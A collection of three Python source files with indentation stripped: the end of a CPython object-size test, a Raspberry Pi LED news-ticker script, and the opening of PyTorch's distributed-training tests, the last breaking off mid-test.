# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3nP' + PySet_MINSIZE*'nP' + '2nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('nP'))
check(frozenset(sample), s + newsize*struct.calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
s = vsize('P2n15Pl4Pn9Pn11PIP')
check(int, s)
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs + 4P)
s = vsize('P2n17Pl4Pn9Pn11PIP') + struct.calcsize('34P 3P 10P 2P 4P')
# Separate block for PyDictKeysObject with 4 entries
s += struct.calcsize("2nPn") + 4*struct.calcsize("n2P")
# class
class newstyleclass(object): pass
check(newstyleclass, s)
# dict with shared keys
check(newstyleclass().__dict__, size('n2P' + '2nPn'))
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_main():
test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
test_main()
|
uticker.py
|
#!/usr/bin/env python
import logging
import config
import tickersources
import threading
import time
from datetime import datetime as dt
from colorsys import hsv_to_rgb
from PIL import ImageFont
from scrollable import Scrollable
from unicornhatmini import UnicornHATMini
import os
dir = os.path.dirname(__file__)
logging.basicConfig(format='%(asctime)s:%(levelname)s:%(message)s', level=logging.DEBUG)
tickercontent={}
#prepare the unicornhat for display
unicornhatmini = UnicornHATMini()
def update_content():
global tickercontent
logging.info('Updating content...')
content = {}
font = ImageFont.truetype(os.path.join(dir, config.general["font"]), 8)
shape = (17,7)
if (config.weather["enabled"]):
content["weather"] = Scrollable("weather",tickersources.get_weather(),tickersources.config.weather["color"],font,shape)
if (config.trends["enabled"]):
content["twitter"] = Scrollable("twitter",tickersources.get_trends(),tickersources.config.trends["color"],font,shape)
if (config.exchange["enabled"]):
content["exchange"] = Scrollable("exchange",tickersources.get_exchange(),tickersources.config.exchange["color"],font,shape)
if (config.news["enabled"]):
content["news"] = Scrollable("news",tickersources.get_news(),tickersources.config.news["color"],font,shape)
tickercontent = content
logging.debug("Content updated:" + "{0}".format(content))
def content_loop():
logging.info('Content update loop started')
while True:
time.sleep(config.general["data_refresh"])
update_content()
def dim_brightness():
global unicornhatmini
if (config.general["night_mode"]):
currenthour = dt.now().hour
logging.info('Current Hour: %d ' , currenthour )
if( (currenthour > config.general["day_starts"]) and (currenthour < config.general["night_starts"]) ):
unicornhatmini.set_brightness(config.general["brightness"])
logging.debug('setting the daytime brightness.')
else:
unicornhatmini.set_brightness(config.general["night_brightness"])
logging.debug('setting the nighttime brightness.')
def set_screen_pixels(image,offset_x, offset_y, color):
global unicornhatmini
display_width, display_height = unicornhatmini.get_shape()
(r, g, b) = color
for y in range(display_height):
for x in range(display_width):
if image.getpixel((x + offset_x, y+offset_y)) == 255:
unicornhatmini.set_pixel(x, y, r, g, b)
else:
unicornhatmini.set_pixel(x, y, 0, 0, 0)
def main():
global unicornhatmini
global tickercontent
logging.info("Starting ..:: uticker ::..")
#get the initial content
logging.info("Getting the initial content to display")
update_content()
#kick-off the content update loop
logging.info("Kicking off the content loop")
content_thread = threading.Thread(target=content_loop, args=())
content_thread.start()
#content_thread.join()
logging.debug("Initial Display setup")
# Set the display rotation from config (use rotate=180 if the display is
# mounted upside down, e.g. in a Pimoroni Scroll Bot)
unicornhatmini.set_rotation(config.general["rotate"])
# Dial down the brightness
dim_brightness()
# Delay is the time (in seconds) between each pixel scrolled
delay = config.general["delay"]
logging.info("initial set-up done")
logging.info("Entering the main loop, for uticker.")
while True:
loop_start = time.time()
display_width, display_height = unicornhatmini.get_shape()
unicornhatmini.clear()
#dim brightness check each loop
dim_brightness()
color = (255,0,0)
logging.debug("random color %s",color)
for key in tickercontent.keys():
content = tickercontent[key]
logging.debug('scroll content %s - with %d lines', content.category, len(content.lengths))
#1. get the content and the imagebuffer
image = content.image
color = content.color
#2. get the content and start looping over lines
for i in range(len(content.lengths)):
linelength = content.lengths[i]
#3. Lift content effect per each line, start with a lift
#reset the x offset and start rolling the line up
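# The Scrollable image appears to place line i in the band starting at
# y = (2*i + 1)*display_height, with a blank band above it; the lift below
# scrolls the viewport down through that blank band so the text rises into view.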
offset_x = 0
offset_y = i*display_height*2
logging.debug('lifting y_offset %d ', offset_y)
while offset_y <= i*display_height*2+display_height:
set_screen_pixels(image,offset_x,offset_y,color)
offset_y += 1
unicornhatmini.show()
time.sleep(delay)
#wait a bit longer after lifting the line for better visualisation
time.sleep(delay*10)
#4. Scroll the content until the length
offset_x = 0
offset_y = (2*i + 1 )*display_height
logging.debug('scrolling x_offset %d and y_offset %d', offset_x, offset_y)
while offset_x + display_width < linelength:
set_screen_pixels(image,offset_x,offset_y,color)
offset_x += 1
unicornhatmini.show()
time.sleep(delay)
logging.info("Finished scrolling full content in %d seconds", time.time()- loop_start)
if __name__ == "__main__":
main()
|
test_c10d_common.py
|
# Owner(s): ["oncall: distributed"]
import copy
import os
import sys
import tempfile
import threading
import time
from datetime import timedelta
from itertools import product
from sys import platform
import torch
import torch.distributed as dist
if not dist.is_available():
print("distributed package not available, skipping tests", file=sys.stderr)
sys.exit(0)
import torch.distributed.distributed_c10d as c10d
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
)
from torch.testing._internal.common_utils import (
TestCase,
load_tests,
run_tests,
TEST_WITH_DEV_DBG_ASAN,
)
if TEST_WITH_DEV_DBG_ASAN:
print("Multiprocessing spawn is not compatible with dev/dbg asan", file=sys.stderr)
sys.exit(0)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
if platform == "darwin":
LOOPBACK = "lo0"
else:
LOOPBACK = "lo"
torch.backends.cuda.matmul.allow_tf32 = False
def gpus_for_rank(world_size):
"""Multigpu tests are designed to simulate the multi nodes with multi
GPUs on each node. Nccl backend requires equal #GPUs in each process.
On a single node, all visible GPUs are evenly
divided to subsets, each process only uses a subset.
"""
visible_devices = list(range(torch.cuda.device_count()))
gpus_per_process = torch.cuda.device_count() // world_size
gpus_for_rank = []
for rank in range(world_size):
gpus_for_rank.append(
visible_devices[rank * gpus_per_process : (rank + 1) * gpus_per_process]
)
return gpus_for_rank
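# Example: with 4 visible GPUs and world_size=2, gpus_per_process is 2 and this
# returns [[0, 1], [2, 3]]: rank 0 uses GPUs 0-1 and rank 1 uses GPUs 2-3.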
class AbstractTimeoutTest(object):
def _test_store_timeout(self, backend, init_method, c2p):
try:
dist.init_process_group(
backend=backend,
init_method=init_method,
world_size=1,
rank=0,
timeout=timedelta(seconds=1),
)
default_store = c10d._get_default_store()
tik = time.time()
with self.assertRaisesRegex(RuntimeError, "Timeout"):
default_store.get("nonexistent key")
tok = time.time()
dist.destroy_process_group()
c2p.append(float(tok - tik))
except RuntimeError as e:
# catch "Address already in use" error and report it to the main
# thread
c2p.append(e)
def _init_methods(self):
f = tempfile.NamedTemporaryFile(delete=False)
if sys.platform == "win32":
yield "file:///%s" % f.name.replace("\\", "/")
f.close()
else:
yield "file://%s" % f.name
f.close()
yield "tcp://127.0.0.1:%d" % common.find_free_port()
def _test_default_store_timeout(self, backend):
for init_method in self._init_methods():
c2p = []
t = threading.Thread(
target=self._test_store_timeout, args=(backend, init_method, c2p)
)
t.daemon = True
t.start()
t.join(5)
self.assertEqual(1, len(c2p))
if isinstance(c2p[0], float):
# waiting time should be 1s, use 3s to rule out false alarm
self.assertGreater(3, c2p[0])
elif isinstance(c2p[0], RuntimeError):
# let @retry_on_connect_failures handle the error
raise c2p[0]
else:
raise RuntimeError("Unexpected type {}".format(type(c2p[0])))
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
class AbstractDistributedDataParallelTest(object):
def tearDown(self):
# DistributedDataParallel tests don't seem to call the FileStore destructor.
# TODO: investigate; these tests are known to have issues.
# Use this hack to remove the file left behind by such tests.
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertTrue(ddp_logging_data.get("is_multi_device_module"))
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model._get_ddp_logging_data()
self.assertFalse(ddp_logging_data.get("is_multi_device_module"))
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training; DDP scatters subsets of the input to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j, rtol=1.3e-06, atol=5e-5)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _gpu_model_with_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False, state=None
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
def _gpu_model_with_builtin_ddp_comm_hook(
self, process_group, hook=None, gradient_as_bucket_view=False
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Register a built-in DDP communication hook if defined
if hook is not None:
gpu_model._register_builtin_comm_hook(hook)
return gpu_model
def _run_and_verify_hook(self, model, input, expected_grad):
# Run forward
output = model(input, self.rank)
# Run backward
output.mean().backward()
[self.assertEqual(p.grad, expected_grad) for p in model.parameters()]
def _simple_hook(
self, state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
fut = torch.futures.Future()
fut.set_result(torch.ones_like(bucket.buffer()))
def fut_then(fut):
# Add ones to fut's result.
t = fut.value()
return t + torch.ones_like(t)
return fut.then(fut_then)
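# When this hook is registered, DDP uses the future's value as the reduced
# bucket contents, so every parameter's .grad ends up as a tensor of twos
# (the ones from set_result plus the ones added in fut_then), regardless of
# the actual gradients.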
class DistributedDataParallelTest(
AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
self._spawn_processes()
def test_invalid_powerSGD_state(self):
for start_powerSGD_iter, use_error_feedback, warm_start in product(
[0, 1], [True, False], [True, False]
):
if not use_error_feedback and not warm_start:
continue
with self.assertRaisesRegex(
ValueError,
"Expect `start_powerSGD_iter` > 1 if `use_error_feedback` or `warm_start` is enabled, "
"because PowerSGD can only be applied after the first two iterations in DDP.",
):
state = powerSGD.PowerSGDState(
process_group=None,
matrix_approximation_rank=1,
start_powerSGD_iter=start_powerSGD_iter,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
class ComputeBucketAssignmentTest(TestCase):
def test_single_limit_single_dtype(self):
tensors = [
torch.empty([100], dtype=torch.float),
torch.empty([200], dtype=torch.float),
torch.empty([100], dtype=torch.float),
torch.empty([50], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0], [1], [2], [3]], result)
def test_single_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [400]
)
self.assertTrue(all(size_lim == 400 for size_lim in per_bucket_size_limits))
self.assertEqual([[0, 2], [1, 3], [4], [5]], result)
def test_multi_limit_single_dtype(self):
tensors = [
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
torch.empty([10], dtype=torch.float),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [40, 80]
)
self.assertEqual(per_bucket_size_limits, [40, 80, 80])
self.assertEqual([[0], [1, 2], [3]], result)
def test_multi_limit_multi_dtype(self):
tensors = [
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
torch.empty([50], dtype=torch.float),
torch.empty([25], dtype=torch.double),
]
result, per_bucket_size_limits = dist._compute_bucket_assignment_by_size(
tensors, [200, 400]
)
self.assertEqual([[0], [1], [2, 4], [3, 5]], result)
self.assertEqual(per_bucket_size_limits, [200, 200, 400, 400])
class AbstractCommTest(object):
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 2
def _verify_sequence_number_across_pg(self, pg, verify_pg):
seq_num = pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
# We use a separate pg to verify the sequence numbers, otherwise these
# collectives will themselves increment the sequence number.
dist.all_gather_object(obj_list, seq_num, group=verify_pg)
self.assertEqual(len(set(obj_list)), 1)
return obj_list[0]
def _test_sequence_num_incremented(self, process_group, ranks):
# verify initial sequence numbers. Use a distinct process group for
# verification to keep counts as expected with respect to process_group.
verify_pg = dist.new_group(
ranks=ranks,
backend="gloo",
)
assert dist.get_world_size(process_group) == dist.get_world_size(verify_pg)
initial_num = (
self._verify_sequence_number_across_pg(
pg=process_group, verify_pg=verify_pg
)
if not c10d._rank_not_in_group(process_group)
else -1
)
# Verify sequence numbers are appropriately incremented
for i in range(10):
t = torch.ones(1, device=torch.cuda.current_device())
dist.all_reduce(t, group=process_group)
if not c10d._rank_not_in_group(process_group):
seq_num = self._verify_sequence_number_across_pg(
pg=process_group,
verify_pg=verify_pg,
)
self.assertEqual(initial_num + i + 1, seq_num)
if dist.get_world_size(process_group) > 2:
# Test when certain ranks don't call collectives
if dist.get_rank(process_group) not in [0, 2]:
dist.all_reduce(t, group=process_group, async_op=True)
# Now ranks 0 and 2 should be lagging by 1.
if not c10d._rank_not_in_group(process_group):
seq_num = process_group._get_sequence_number_for_group()
rank = dist.get_rank(process_group)
obj_list = [None for _ in range(dist.get_world_size(verify_pg))]
dist.all_gather_object(obj_list, (rank, seq_num), group=verify_pg)
rank_to_seq_num = {rank: num for (rank, num) in obj_list}
self.assertEqual(len(set(rank_to_seq_num.values())), 2)
self.assertEqual(rank_to_seq_num[0], rank_to_seq_num[2])
expected_same = {
rank_to_seq_num[i]
for i in rank_to_seq_num.keys()
if i not in [0, 2]
}
self.assertEqual(len(expected_same), 1)
self.assertEqual(rank_to_seq_num[0] + 1, rank_to_seq_num[1])
def _test_sequence_num_incremented_default_group(self, backend_name):
torch.cuda.set_device(self.rank)
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
self._test_sequence_num_incremented(
c10d._get_default_group(),
ranks=list(i for i in range(dist.get_world_size())),
)
def _test_sequence_num_incremented_subgroup(self, backend_name):
torch.cuda.set_device(self.rank)
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend_name,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup_ranks = [0, 1, 2]
subgroup = dist.new_group(subgroup_ranks)
self._test_sequence_num_incremented(subgroup, subgroup_ranks)
def _test_sequence_num_set_default_pg(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
default_pg = c10d._get_default_group()
seq_num = default_pg._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size())]
dist.all_gather_object(obj_list, seq_num)
self.assertEqual(len(set(obj_list)), 1)
def _test_sequence_num_set_new_group(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
subgroup = dist.new_group([0, 1])
if not c10d._rank_not_in_group(subgroup):
subgroup_seq = subgroup._get_sequence_number_for_group()
obj_list = [None for _ in range(dist.get_world_size(subgroup))]
dist.all_gather_object(obj_list, subgroup_seq, group=subgroup)
self.assertEqual(len(set(obj_list)), 1)
def _test_warn_not_in_group(self, backend):
store = dist.FileStore(self.file_name, self.world_size)
dist.init_process_group(
backend,
world_size=self.world_size,
rank=self.rank,
store=store,
)
in_group_ranks = list(filter(lambda x: x % 2 == 0, range(self.world_size)))
group = dist.new_group(in_group_ranks)
x = torch.zeros(2, 2).cuda(self.rank)
xs = [torch.zeros(2, 2).cuda(self.rank) for _ in range(len(in_group_ranks))]
if self.rank not in in_group_ranks:
msg = ".*{}.*does not belong to.*"
with self.assertWarnsOnceRegex(UserWarning, msg.format("all_gather")):
dist.all_gather(xs, x, group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("all_reduce")):
dist.all_reduce(x, group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("barrier")):
dist.barrier(group=group)
with self.assertWarnsOnceRegex(UserWarning, msg.format("broadcast")):
dist.broadcast(x, src=0, group=group)
else:
dist.all_gather(xs, x, group=group)
dist.all_reduce(x, group=group)
dist.barrier(group=group)
dist.broadcast(x, src=0, group=group)
class CommTest(AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_debug_level(self):
try:
del os.environ["TORCH_DISTRIBUTED_DEBUG"]
except KeyError:
pass
dist.set_debug_level_from_env()
# Default should be off
default_debug_mode = dist.get_debug_level()
self.assertEqual(default_debug_mode, dist.DebugLevel.OFF)
mapping = {
"OFF": dist.DebugLevel.OFF,
"off": dist.DebugLevel.OFF,
"oFf": dist.DebugLevel.OFF,
"INFO": dist.DebugLevel.INFO,
"info": dist.DebugLevel.INFO,
"INfO": dist.DebugLevel.INFO,
"DETAIL": dist.DebugLevel.DETAIL,
"detail": dist.DebugLevel.DETAIL,
"DeTaIl": dist.DebugLevel.DETAIL,
}
invalid_debug_modes = ["foo", 0, 1, -1]
for mode in mapping.keys():
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
dist.set_debug_level_from_env()
set_debug_mode = dist.get_debug_level()
self.assertEqual(
set_debug_mode,
mapping[mode],
f"Expected {mode} to map to {mapping[mode]} but got {set_debug_mode}",
)
for mode in invalid_debug_modes:
os.environ["TORCH_DISTRIBUTED_DEBUG"] = str(mode)
with self.assertRaisesRegex(RuntimeError, "The value of TORCH_DISTRIBUTED_DEBUG must"):
dist.set_debug_level_from_env()
class DummyWork(dist._Work):
def wait(self, timeout=5.0):
if torch.cuda.is_available():
torch.cuda.current_stream().synchronize()
return True
class DummyProcessGroup(dist.ProcessGroup):
def getBackendName(self):
return "Dummy"
def allgather(self, output_tensor_lists, input_tensor_list, opts=None):
for output_tensor_list, input_tensor in zip(output_tensor_lists, input_tensor_list):
for output_tensor in output_tensor_list:
output_tensor.copy_(input_tensor)
return DummyWork()
def allreduce(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
def barrier(self, opts=None):
store = c10d._get_default_store()
key = "TEST:DummyProcessGroup:barrier"
if self.rank() == 0:
worker_count = 0
# By default, TCPServer lives on rank 0. So rank 0 needs to make
# sure that it does not exit too early before other ranks finish
# using the store.
# Note that, _store_based_barrier does not solve this problem, as
# all ranks need to run at least one store.add(key, 0) before
# exiting, but there is no guarantee that rank 0 is still alive at
# that point.
while worker_count < self.size() - 1:
worker_count = store.add(key, 0)
else:
store.add(key, 1)
return DummyWork()
def broadcast(self, tensor_list, opts=None):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def reduce_scatter(self, output_tensor_list, input_tensor_lists, opts=None):
for output_tensor, input_tensor_list in zip(output_tensor_list, input_tensor_lists):
output_tensor.copy_(input_tensor_list[self.rank()])
return DummyWork()
def send(self, tensor_list, dst, tag=0):
for tensor in tensor_list:
tensor.add_(1)
return DummyWork()
def recv(self, tensor_list, src, tag=0):
for tensor in tensor_list:
tensor.add_(2)
return DummyWork()
class PythonProcessGroupExtensionTest(MultiProcessTestCase):
def setUp(self):
super(PythonProcessGroupExtensionTest, self).setUp()
self._spawn_processes()
def tearDown(self):
super(PythonProcessGroupExtensionTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def test_get_backend_name(self):
dpg = DummyProcessGroup(0, 1)
self.assertEqual("Dummy", dpg.name())
def test_backend_class_attr(self):
dist.Backend.register_backend(
"dummy",
PythonProcessGroupExtensionTest.create_dummy
)
self.assertEqual(dist.Backend.DUMMY, "DUMMY")
self.assertEqual(
dist.Backend._plugins["DUMMY"],
PythonProcessGroupExtensionTest.create_dummy
)
@staticmethod
def create_dummy(store, rank, size, timeout):
return DummyProcessGroup(rank, size)
def test_collectives(self):
dist.Backend.register_backend("dummy", PythonProcessGroupExtensionTest.create_dummy)
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '6789'
dist.init_process_group("dummy", rank=self.rank, world_size=self.world_size)
# test all_gather
input_tensor = torch.ones(2, 2) * 7
output_tensor_list = [torch.zeros(2, 2) for _ in range(self.world_size)]
dist.all_gather(output_tensor_list, input_tensor)
for tensor in output_tensor_list:
self.assertEqual(tensor, input_tensor)
# test all_reduce
input_tensor = torch.ones(2, 2) * 7
dist.all_reduce(input_tensor)
self.assertEqual(input_tensor, torch.ones(2, 2) * 7 + 2)
# test broadcast
input_tensor = torch.zeros(2, 2)
dist.broadcast(input_tensor, 0, async_op=True).wait()
self.assertEqual(torch.ones(2, 2), input_tensor)
# test reduce_scatter
output_tensor = torch.zeros(2, 2)
input_tensor_list = [torch.ones(2, 2) for _ in range(self.world_size)]
dist.reduce_scatter(output_tensor, input_tensor_list)
